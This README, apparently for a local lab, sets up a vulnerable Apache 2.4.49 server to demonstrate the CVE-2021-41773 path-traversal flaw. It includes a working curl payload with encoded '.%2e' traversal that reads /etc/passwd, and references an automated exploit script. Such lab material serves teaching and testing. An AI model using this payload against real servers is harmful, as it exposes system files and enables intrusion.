Share
## https://sploitus.com/exploit?id=C6512DA1-8200-5631-8F72-B929488F2794
# Apache 2.4.49 Path Traversal Lab โ€” CVE-2021-41773

## Clone

```bash
git clone https://github.com/zubairahm3d/apache-cve-2021-41773-lab.git
cd apache-cve-2021-41773-lab
chmod +x apache_lab.sh
```

## Usage

**Start the vulnerable server:**

```bash
./apache_lab.sh  # choose option 1
```

**Manual exploit:**

```bash
curl --path-as-is http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
```

**Automated exploit:**

```bash
python3 exploit.py
```

**Stop the server:**

```bash
./apache_lab.sh  # choose option 2
```

---
## Lab Setup
![Lab setup](images/1-setup-vuln-lab.png)

## Version confirmation
![Version confirmation](images/2-confirm-version.png)

# Manual path traversal
![Manual path traversal](images/3-manual-path-traversal.png)

# Exploit
![Exploit output](images/4-exploit.png)